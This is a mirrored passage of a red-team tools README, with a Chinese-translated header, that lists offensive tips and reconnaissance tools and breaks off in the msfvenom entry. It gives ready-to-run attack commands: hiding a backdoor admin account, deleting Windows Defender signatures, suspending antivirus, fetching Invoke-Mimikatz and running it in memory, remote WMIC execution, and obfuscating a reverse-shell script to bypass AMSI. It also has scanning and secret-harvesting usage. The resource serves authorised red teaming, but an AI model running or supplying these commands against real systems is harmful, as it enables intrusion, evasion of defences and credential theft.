A-poc/RedTeam-Tools

GitHub: A-poc/RedTeam-Tools

红队与渗透测试的实用工具集合,提供覆盖攻击链各阶段的开源技术与操作技巧。

Stars: 8662 | Forks: 1171

# RedTeam-Tools

这个 GitHub 仓库包含了 **150+** 个 **工具** 和 **资源**,可用于 **红队行动**。 部分工具是专门为红队行动设计的,而其他工具则更为通用,可以根据红队场景进行适配使用。 # 工具列表
红队技巧 19 个提示
侦察 24 个工具
资源开发 12 个工具
初始访问 10 个工具
执行 13 个工具
持久化 4 个工具
权限提升 11 个工具
防御规避 8 个工具
    • Invoke-Obfuscation 脚本混淆器
    • Veil Metasploit 载荷混淆器
    • SharpBlock 通过入口点执行预防绕过 EDR
    • Alcatraz GUI x64 二进制文件混淆器
    • Mangle 可编译可执行文件操作
    • AMSI Fail 破坏或禁用 AMSI 的 PowerShell 片段
    • ScareCrow 围绕 EDR 绕过设计的载荷创建框架
    • moonwalk Linux 系统日志与文件系统时间戳移除工具
凭据访问 11 个工具
发现 6 个工具
横向移动 12 个工具
收集 3 个工具
命令与控制 9 个工具
外泄 6 个工具
影响 4 个工具
# Red Team Tips *Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.* ### [🔙](#tool-list)Improved HTML smuggling with mouse move eventlistener **Description:** *'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti evasion in sandbox's the zip wont drop.'* **Credit:** [@pr0xylife](https://x.com/pr0xylife) **Link:** [Twitter](https://x.com/pr0xylife/status/1598410732516802563) ### [🔙](#tool-list)Google translate for phishing **Description:** *Successful phishing page credential stealing being proxied via the google translate page view functionality.* **Credit:** [@malmoeb](https://x.com/malmoeb) **Link:** [Twitter](https://x.com/malmoeb/status/1671106885590630400) ### [🔙](#tool-list)Hiding the local admin account ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f ``` **Description:** *'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728) ### [🔙](#tool-list)Cripple windows defender by deleting signatures ``` "%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` **Description:** *'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1611005101262389250) ### [🔙](#tool-list)Enable multiple RDP sessions per user ``` reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f ``` **Description:** *'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016) ### [🔙](#tool-list)Sysinternals PsExec.exe local alternative ``` wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command " ``` **Description:** *'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'* **Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux) **Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1607473627922063360) ### [🔙](#tool-list)Live off the land port scanner ``` 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(,$_)) "Port $_ open"} 2>$null ``` **Description:** *'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096) ### [🔙](#tool-list)Proxy aware PowerShell DownloadString ``` $w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("") ``` **Description:** *'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1596192664398966785) ### [🔙](#tool-list)Looking for internal endpoints in browser bookmarks ``` type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type" ``` **Description:** *'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200) ### [🔙](#tool-list)Query DNS records for enumeration ``` Get-DnsRecord -RecordType A -ZoneName FQDN -Server ``` **Description *'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1587132627823181824) ### [🔙](#tool-list)Unquoted service paths without PowerUp ``` Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` **Description:** *'Finding unquoted service paths without PowerUp'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064) ### [🔙](#tool-list)Bypass a disabled command prompt with /k ``` # Win+R (To bring up Run Box) cmd.exe /k "whoami" ``` **Description:** *'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.* **Credit:** Martin Sohn Christensen **Link:** [Blog](https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you) ### [🔙](#tool-list)Stop windows defender deleting mimikatz.exe ``` (new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv ``` **Description:** *'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'* **Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux) **Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216) ### [🔙](#tool-list)Check if you are in a virtual machine ``` reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare" ``` **Description:** *'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'* **Credit:** [@dmcxblue](https://twitter.com/dmcxblue) **Link:** [Twitter](https://twitter.com/dmcxblue/status/1366779034672136194) ### [🔙](#tool-list)Enumerate AppLocker rules ``` (Get-AppLockerPolicy -Local).RuleCollections Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\ ``` **Description:** *'AppLocker can be a pain. Enumerate to see how painful'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624) ### [🔙](#tool-list)CMD shortcut with 6 pixels via mspaint ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/063ad3bef8174813.png) 1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels 2. Zoom in to make the following tasks easier 3. Using the colour picker, set pixels values to (from left to right): - 1st: R: 10, G: 0, B: 0 - 2nd: R: 13, G: 10, B: 13 - 3rd: R: 100, G: 109, B: 99 - 4th: R: 120, G: 101, B: 46 - 5th: R: 0, G: 0, B: 101 - 6th: R: 0, G: 0, B: 0 4. Save it as 24-bit Bitmap (*.bmp;*.dib) 5. Change its extension from bmp to bat and run. **Description:** *'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'* **Credit:** [PenTestPartners](https://www.pentestpartners.com/) **Link:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell) ### [🔙](#tool-list)Link spoofing with PreventDefault JavaScript method ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/bf1cfe179b174814.png) ``` PreventDefault Example Go to Google ``` **Description:** *Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link `google.com`, but once clicked the victim will be redirected to your malicious link `bing.com`. Great for getting victims to download payloads via a controlled site.* **Link:** [PreventDefault Docs](https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault) ### [🔙](#tool-list)Check SMB firewall rules with Responder ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/13a01e07e9174816.png) ``` Copy-Item -Path "C:\tmp\" -Destination "\\\c$" ``` **Description:** *'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: `Copy-Item -Path "C:\tmp\" -Destination "\\\c$"`. If Responder could capture the hash, the firewall allows outgoing SMB connections'* **Credit:** [@malmoeb](https://twitter.com/malmoeb) **Link:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433) ### [🔙](#tool-list)Disable AV with SysInternals PsSuspend ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/02cb1532be174818.png) **Description:** *Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.* **Related Blog Post:** [Bypassing AV via Process Suspension with PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7) **Link:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046) # Reconnaissance ### [🔙](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot) SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate. SpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet. **Install:** ``` wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz cd spiderfoot-4.0 pip3 install -r requirements.txt ``` For full installation instructions see [here](https://github.com/smicallef/spiderfoot?tab=readme-ov-file#installing--running). **Usage:** ``` python3 ./sf.py -l 127.0.0.1:5001 ``` Lots of usage tutorial videos [here](https://asciinema.org/~spiderfoot) ![spiderfoot](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/1963523b53174820.png) *Image used from https://github.com/smicallef/spiderfoot* ### [🔙](#tool-list)[reconftw](https://github.com/six2dez/reconftw) reconFTW automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. **Install:** ``` git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh ``` For full installation instructions see [here](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide). **Usage:** ``` # Single target domain ./reconftw.sh -d target.com -r # One target with multiple domains ./reconftw.sh -m target -l domains.txt -r # Passive recon ./reconftw.sh -d target.com -p # Perform all checks and exploitations ./reconftw.sh -d target.com -a ``` For full usage instructions [here](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide). ![reconftw](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/da3d61a1e7174823.png) *Image used from https://www.youtube.com/watch?v=TQmDAtkD1Wo* ### [🔙](#tool-list)[subzy](https://github.com/PentestPad/subzy) Subdomain takeover tool which works based on matching response fingerprints from [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md). **Install:** ``` go install -v github.com/PentestPad/subzy@latest ``` For full installation instructions see [here](https://github.com/PentestPad/subzy?tab=readme-ov-file#installation). **Usage:** ``` # List of subdomains ./subzy run --targets list.txt # Single or multiple targets ./subzy run --target test.google.com ./subzy run --target test.google.com,https://test.yahoo.com ``` ![subzy](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/96fc191fe6174825.jpg) *Image used from https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/* ### [🔙](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum) SMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality. **Install:** ``` pip install smtp-user-enum ``` **Usage:** ``` smtp-user-enum [options] -u/-U host port smtp-user-enum --help smtp-user-enum --version ``` ![smtp-user-enum](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/5205ed5f65174828.png) *Image used from https://www.kali.org/tools/smtp-user-enum/* ### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness I have put together a bash one-liner that: - Passively collects a list of subdomains from certificate associations ([crt.sh](https://crt.sh/)) - Actively requests each subdomain to verify it's existence ([httprobe](https://github.com/tomnomnom/httprobe)) - Actively screenshots each subdomain for manual review ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness)) **Usage:** ``` domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web ``` *Note: You must have [httprobe](https://github.com/tomnomnom/httprobe), [pup](https://github.com/EricChiang/pup) and [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains* ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/46e3463c1b174829.png) ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/a31e4031b1174830.png) ### [🔙](#tool-list)[jsendpoints](https://twitter.com/renniepak/status/1602620834463588352) A JavaScript bookmarklet for extracting all webpage endpoint links on a page. Created by [@renniepak](https://twitter.com/renniepak), this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage. ``` javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i")})}setTimeout(writeResults,3e3);})(); ``` **Usage (Bookmarklet)** Create a bookmarklet... - `Right click your bookmark bar` - `Click 'Add Page'` - `Paste the above Javascript in the 'url' box` - `Click 'Save'` ...then visit the victim page in the browser and click the bookmarklet. ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/73b57dc358174831.png) **Usage (Console)** Paste the above Javascript into the console window `F12` and press enter. ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/703f3af913174833.png) ### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei) Fast vulnerability scanner that uses .yaml templates to search for specific issues. **Install:** ``` go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest ``` **Usage:** ``` cat domains.txt | nuclei -t /PATH/nuclei-templates/ ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/dd50a51285174834.png) ### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff) certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file. You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of. **Install:** ``` git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt ``` **Usage:** ``` python3 certSniff.py -f example.txt ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/954ba7a918174836.png) ### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/) Nice tool for brute forcing file/folder paths on a victim website. **Install:** ``` sudo apt install gobuster ``` **Usage:** ``` gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20 ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/21c2b4682d174837.png) ### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster) A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker. Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc... **Install: (Kali)** ``` sudo apt update && sudo apt install -y feroxbuster ``` **Install: (Mac)** ``` curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash ``` **Install: (Windows)** ``` Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .\feroxbuster.zip .\feroxbuster\feroxbuster.exe -V ``` For full installation instructions see [here](https://epi052.github.io/feroxbuster-docs/docs/installation/). **Usage:** ``` # Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx # Scan with headers ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}" # Read URLs from stdin cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files # Proxy requests through burpsuite ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080 ``` ``` Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/). ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/bb3da2e002174839.png) *Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif* ### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute) A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vr, Linode). Features: - Cloud detection (IPINFO API and Source Code) - Fast (concurrent) - Cross Platform (windows, linux, mac) - User-Agent Randomization - Proxy Randomization (HTTP, Socks5) **Install:** Download the latest [release](https://github.com/0xsha/CloudBrute/releases) for your system and follow the usage. **Usage:** ``` # Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt' CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" # Output results to file CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/d6ab7ce6fb174840.png) *Image used from https://github.com/0xsha/CloudBrute* ### [🔙](#tool-list)[dnsrecon](https://www.kali.org/tools/dnsrecon/#dnsrecon) dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search. **Install:** ``` sudo apt install dnsrecon ``` **Usage:** ``` dnsrecon -d google.com ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/20c73d64b6174841.png) ### [🔙](#tool-list)[shodan.io](https://www.shodan.io/dashboard) Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan. ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/17724a3285174843.png) ### [🔙](#tool-list)[AORT](https://github.com/D3Ext/AORT) Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting. **Install:** ``` git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt ``` **Usage:** ``` python3 AORT.py -d google.com ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/65c4d8c475174844.png) ### [🔙](#tool-list)[spoofcheck](https://github.com/BishopFox/spoofcheck) A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails. Domains are spoofable if any of the following conditions are met: - Lack of an SPF or DMARC record - SPF record never specifies `~all` or `-all` - DMARC policy is set to `p=none` or is nonexistent **Install:** ``` git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt ``` **Usage:** ``` ./spoofcheck.py [DOMAIN] ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/2b121827ce174845.png) ### [🔙](#tool-list)[AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files. **Install:** ``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt ``` **Usage:** ``` usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE] optional arguments: -h, --help show this help message and exit -D Download files. This requires significant diskspace -d If set to 1 or True, create directories for each host w/ results -t THREADS number of threads -l HOSTLIST -g GREPWORDS Provide a wordlist to grep for -m MAXSIZE Maximum file size to download. python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1 ``` ### [🔙](#tool-list)[GitHarvester](https://github.com/metac0rtex/GitHarvester) Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects. **Install:** ``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester ``` **Usage:** ``` ./githarvester.py ``` ### [🔙](#tool-list)[truffleHog](https://github.com/dxa4481/truffleHog) TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository. **Install (Binaries):** [Link](https://github.com/trufflesecurity/trufflehog/releases) **Install (Go):** ``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install ``` **Usage:** ``` trufflehog https://github.com/trufflesecurity/test_keys ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/365a6f8b7e174847.png) ### [🔙](#tool-list)[Dismap](https://github.com/zhzyker/dismap) Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks. Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc. **Install:** Dismap is a binary file for Linux, MacOS, and Windows. Go to [Release](https://github.com/zhzyker/dismap/releases) to download the corresponding version to run: ``` # Linux or MacOS chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h # Windows dismap-0.3-windows-amd64.exe -h ``` **Usage:** ``` # Scan 192.168.1.1 subnet ./dismap -i 192.168.1.1/24 # Scan, output to result.txt and json output to result.json ./dismap -i 192.168.1.1/24 -o result.txt -j result.json # Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds ./dismap -i 192.168.1.1/24 --np --timeout 10 # Scan, Number of concurrent threads 1000 ./dismap -i 192.168.1.1/24 -t 1000 ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/c24c84153c174849.png) *Image used from https://github.com/zhzyker/dismap* ### [🔙](#tool-list)[enum4linux](https://github.com/CiscoCXSecurity/enum4linux) A tool for enumerating information from Windows and Samba systems. It can be used to gather a wide range of information, including: - Domain and domain controller information - Local user and group information - Shares and share permissions - Security policies - Active Directory information **Install: (Apt)** ``` sudo apt install enum4linux ``` **Install: (Git)** ``` git clone https://github.com/CiscoCXSecurity/enum4linux cd enum4linux ``` **Usage:** ``` # 'Do everything' enum4linux.pl -a 192.168.2.55 # Obtain list of usernames (RestrictAnonymous = 0) enum4linux.pl -U 192.168.2.55 # Obtain list of usernames (using authentication) enum4linux.pl -u administrator -p password -U 192.168.2.55 # Get a list of groups and their members enum4linux.pl -G 192.168.2.55 # Verbose scan enum4linux.pl -v 192.168.2.55 ``` Full usage information can be found in this [blog](https://labs.portcullis.co.uk/tools/enum4linux/). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/f142c9ddcb174850.png) *Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/* ### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty) Dangerously fast dns/network/port scanner, created by [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), written in rust. You will need a subdomains file. *E.g. [Subdomain wordlist by Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*. **Install:** Download the latest release from [here](https://twitter.com/GuhnooPlusLinux). ``` # Install a wordlist sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists ``` **Usage:** ``` skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/e7dca68724174852.png) *Image used from https://github.com/Esc4iCEscEsc/skanuvaty* ### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor) Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key. **Main Features:** - Searching information about IP Address, ASN and Organization. - Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR. - Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc). - Get Summary about IP address (powered by [@thebl4ckturtle](https://github.com/theblackturtle)) **Install:** ``` go install github.com/j3ssie/metabigor@latest ``` **Usage:** ``` # discovery IP of a company/organization echo "company" | metabigor net --org -o /tmp/result.txt # Getting more related domains by searching for certificate info echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command # Only run rustscan with full ports echo '1.2.3.4/24' | metabigor scan -o result.txt # Reverse Whois to find related domains echo 'example.com' | metabigor related -s 'whois' # Get Google Analytics ID directly from the URL echo 'https://example.com' | metabigor related -s 'google-analytic' ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/d43b7ba2b9174853.png) *Image used from https://github.com/j3ssie/metabigor* ### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob) Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. The findings will be presented through a web interface for easy browsing and analysis. **Note:** *Gitrob will need a Github access token in order to interact with the Github API. [Create a personal access token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) and save it in an environment variable in your .bashrc or similar shell configuration file:* ``` export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef ``` **Install: (Go)** ``` go get github.com/michenriksen/gitrob ``` **Install: (Binary)** A [precompiled version](https://github.com/michenriksen/gitrob/releases) is available for each release. **Usage:** ``` # Run against org gitrob {org_name} # Saving session to a file gitrob -save ~/gitrob-session.json acmecorp # Loading session from a file gitrob -load ~/gitrob-session.json ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/ecb6f44cdd174855.png) *Image used from https://www.uedbox.com/post/58828/* ### [🔙](#tool-list)[gowitness](https://github.com/sensepost/gowitness) Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working. **Install: (Go)** ``` go install github.com/sensepost/gowitness@latest ``` Full installation information can be found [here](https://github.com/sensepost/gowitness/wiki/Installation). **Usage:** ``` # Screenshot a single website gowitness single https://www.google.com/ # Screenshot a cidr using 20 threads gowitness scan --cidr 192.168.0.0/24 --threads 20 # Screenshot open http services from an namp file gowitness nmap -f nmap.xml --open --service-contains http # Run the report server gowitness report serve ``` Full usage information can be found [here](https://github.com/sensepost/gowitness/wiki/Usage). ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/4fde2f5465174856.png) *Image used from https://github.com/sensepost/gowitness* # Resource Development ### [🔙](#tool-list)[remoteInjector](https://github.com/JohnWoodman/remoteinjector) Injects link to remote word template into word document. This Python-based utility modifies a .docx file’s settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled. [Related Blog Post](https://john-woodman.com/research/vba-macro-remote-template-injection/) **Install:** ``` git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector ``` **Usage:** ``` python3 remoteinjector.py -w https://example.com/template.dotm example.docx ``` ### [🔙](#tool-list)[Chimera](https://github.com/tokyoneon/Chimera) Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures. **Install:** ``` sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help ``` **Usage:** ``` ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\ copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\ invoke-expression,out-string,write-error -j -g -k -r -p ``` ![image](https://static.pigsec.cn/wp-content/uploads/repos/2026/04/3c221b0b6a174858.png) ### [🔙](#tool-list)[msfvenom](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/) Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also 